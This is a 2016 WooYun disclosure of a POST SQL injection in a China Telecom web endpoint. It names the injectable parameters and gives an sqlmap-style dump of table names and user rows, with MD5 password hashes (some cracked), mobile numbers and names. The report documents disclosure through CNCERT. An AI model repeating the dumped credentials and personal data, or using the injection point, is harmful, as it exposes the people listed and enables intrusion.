当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0212254

漏洞标题:运营商安全之中国电信某处注入

相关厂商:中国电信

漏洞作者: 李旭敏

提交时间:2016-05-24 12:20

修复时间:2016-07-10 11:20

公开时间:2016-07-10 11:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-24: 细节已通知厂商并且等待厂商处理中
2016-05-26: 厂商已经确认,细节仅向厂商公开
2016-06-05: 细节向核心白帽子及相关领域专家公开
2016-06-15: 细节向普通白帽子公开
2016-06-25: 细节向实习白帽子公开
2016-07-10: 细节向公众公开

简要描述:

滴,学生卡

详细说明:

**.**.**.**/zhanyiweb/Ajax/ajax_get_if_user_exis
存在POST注入

username=111&userpwd=222


QQ截图20160524095557.jpg

漏洞证明:

Database: newobj
[35 tables]
+--------------------------------+
| wy_del_t |
| wy_dup_t |
| zsw_entity_addon |
| zsw_entity_common |
| zy_access |
| zy_category |
| zy_configlog |
| zy_croon |
| zy_discipline |
| zy_discipline_category |
| zy_entity_addon |
| zy_entity_addon_20150115 |
| zy_entity_common |
| zy_entity_common_20150312bylwq |
| zy_errorlog |
| zy_excel_log |
| zy_feedback |
| zy_form |
| zy_group |
| zy_label |
| zy_level_address |
| zy_moxing |
| zy_moxing_attribute |
| zy_moxing_attribute_copy |
| zy_moxing_type |
| zy_node |
| zy_objid_neid |
| zy_qrcode_info |
| zy_role |
| zy_role_user |
| zy_user |
| zy_version |
| zy_workflow |
| zy_workflow_log |
| zy_workflow_template |
+--------------------------------+


跑了几条user表

+-------------------+---------------------------------------------+-------------
-+---------------------------------------------------+----+
| email | password | mobile_phone
| nickname | id |
+-------------------+---------------------------------------------+-------------
-+---------------------------------------------------+----+
| liu21st@**.**.**.** | fb92fa287a5134321f8734db496c5a12 | 13309918600
| \\u7ba1\\u7406\\u5458 | 1 |
| <blank> | fe01ce2a7fbac8fafaed7c982a04e229 (demo) | NULL
| \\u6f14\\u793a | 2 |
| <blank> | aa08769cdcb26674c6706093503ff0a3 (member) | NULL
| \\u5458\\u5de5 | 3 |
| <blank> | c444858e0aaeb727da73d2eae62321ad (leader) | NULL
| \\u9886\\u5bfc | 4 |
| <blank> | 93fbc72339cafa418834ccb0093349fb | 13319828599
| \\u5218\\u6c5f | 35 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 13312341234
| \\u674e\\u4e07\\u94a6 | 36 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 13312344456
| \\u6768\\u6f47 | 37 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 13312341234
| \\u5218\\u660c\\u5229 | 39 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 13312341234
| \\u90b1\\u51ef | 40 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 13312341234
| \\u738b\\u6631 | 41 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 13312341234
| \\u5f20\\u957f\\u6c5f | 42 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 18095995643
| \\u5218\\u5efa | 43 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 15309912651
| \\u5f20\\u6d9b | 44 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 18160570318
| \\u674e\\u7586 | 51 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 13369629879
| \\u5468\\u4e3d\\u840d | 52 |
| <blank> | 0637a3b20808dd4dbbe0074bbeddabe1 | 15309910790
| \\u957f\\u9014\\u4f20\\u8f93\\u5c40\\u7530 | 53 |
| <blank> | 4297f44b13955235245b2497399d7a93 (123123) | 123123123
| \\u4e4c\\u9c81\\u6728\\u9f50\\u7ad9\\u957f1 | 54 |
| <blank> | 030d3e1f79ba96bac41c3b65ab31b96c | 15309968889
| \\u5218\\u68a6\\u9f99 | 55 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 18109915888
| \\u5f20\\u6d32 | 56 |
| <blank> | 201d6b08baaf9d913dfa4bb693b1ce0e | 13309916258
| \\u4e4c\\u9c81\\u6728\\u9f50\\u5e02\\u7535\\u4fe1 | 57 |
| <blank> | 9f788b4f2ec33dac27af7ec8f23c774b | 15309911516
| \\u51af\\u76ca\\u6c11 | 58 |
| <blank> | 458b2e202ed63fc9bc300240a40bbf67 | 18963800474
| \\u54c8\\u54c8 | 59 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 13369627776
| \\u5353\\u5cea | 60 |
| <blank> | 74f81aa2db70e0fbf274dfed561a05b5 | 18199152039
| \\u90b1\\u51ef | 61 |
| <blank> | fb81dc0b23c736201252b8d3e086b856 | 13325580916
| \\u674e\\u7231\\u6dd1 | 62 |
| <blank> | f0aab2200d1d4e7727fd53f674f88841 | 18909915599
| \\u8881\\u603b | 63 |
| <blank> | 067d7208c870e997c0e47d7f82dd457c | 13309913365
| \\u5f20\\u6d8c | 64 |
| <blank> | caadf385612bc2d90e8be724239ff91f | 13309913365
| \\u7f51\\u8fd0\\u5f20\\u6d8c | 65 |
| <blank> | 200820e3227815ed1756a6b531e7e0d2 (qwe123) | 13888888888
| \\u5f20\\u4e09 | 66 |
| <blank> | 3439b8456ece40ffed490454556987a2 | 18195931566
| \\u767d\\u767d | 67 |
| <blank> | 62c8ad0a15d9d1ca38d5dee762a16e01 (1234qwer) | 13113113113
| \\u73a9\\u73a9 | 68 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 18999111203
| \\u6d4b\\u8bd5 | 69 |
| <blank> | e368b9938746fa090d6afd3628355133 (demo1) | 18988999988
| \\u6f14\\u793a\\u8d26\\u53f7 | 70 |
| <blank> | e07fc64799bb5f3d7d68b735b5f3346e | 13309911008
| \\u5b89\\u519b | 71 |
| <blank> | 1bbd886460827015e5d605ed44252251 (11111111) | 15309910296
| \\u9648\\u66e6 | 72 |
| <blank> | 1adbb3178591fd5bb0c248518f39bf6d (asdf1234) | 18299152027
| \\u8d75\\u5c1a\\u6587 | 73 |
| <blank> | 4316319143708a22c8f6af9d11fc53db | 18199152027
| \\u4e4c\\u9c81\\u6728\\u9f50\\u4e2d\\u5c71\\u8def | 74 |
| <blank> | e7f2173d1a2528212b3b5e4a6e8472c9 | 13325590282
| \\u90a2\\u5929\\u5cf0 | 76 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 18199999999
| \\u90a2\\u5929\\u5cf0 | 77 |
| <blank> | 5d93ceb70e2bf5daa84ec3d0cd2c731a (qwer1234) | 18099649648
| \\u963f\\u5e03 | 78 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 18099649648
| \\u963f\\u5e03 | 79 |
| <blank> | cc03e747a6afbbcbf8be7668acfebee5 (test123) | 13309918600
| \\u738b\\u6631 | 80 |
| <blank> | cc03e747a6afbbcbf8be7668acfebee5 (test123) | 13309918600
| \\u738b\\u6631 | 81 |
| <blank> | 0c5a3e8915871b710c2cc98073748424 | 18009918910
| \\u674e\\u658c | 82 |
| <blank> | 28ec091f80eac9997879b1e7c3cf4b58 (venus123) | 18690192799
| \\u542f\\u660e\\u6d4b\\u8bd5 | 83 |
| <blank> | d74682ee47c3fffd5dcd749f840fcdd4 (qwerqwer) | 18999111203
| \\u5f20\\u4e09 | 84 |
| <blank> | e120ea280aa50693d5568d0071456460 (123asd) | 13309916530
| \\u5929\\u7a7a | 85 |
| <blank> | 75153226a6f386b3fbaa9d3331b9413a | 13999099111
| \\u6d4b\\u8bd5 | 86 |
| <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | 15309910286
| \\u5f20\\u5175 | 87 |
+-------------------+---------------------------------------------+-------------

修复方案:

版权声明:转载请注明来源 李旭敏@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-05-26 11:18

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无